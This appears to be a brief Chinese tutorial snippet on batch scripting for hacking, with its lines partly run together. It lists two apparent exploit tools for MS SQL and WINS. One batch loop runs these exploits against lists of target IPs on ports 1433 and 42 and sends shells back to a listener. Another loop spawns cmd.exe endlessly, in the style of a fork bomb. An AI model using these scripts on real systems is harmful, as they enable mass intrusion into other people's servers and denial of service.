admin
教程主题:功能强大的批处理(上)
需要用到的工具:sqlhello.exe wins_exp.exe
内容:
Bat-1for /f %%i in (1433.txt) do sqlhello.exe %%i 1433 127.0.0.1 1234for /f %%i in (42.txt) do ms -r %%i -t 0 -l 127.0.0.1 -p 1234
Bat-2:labelstart cmd.exe & goto label
Bat-3call test.bat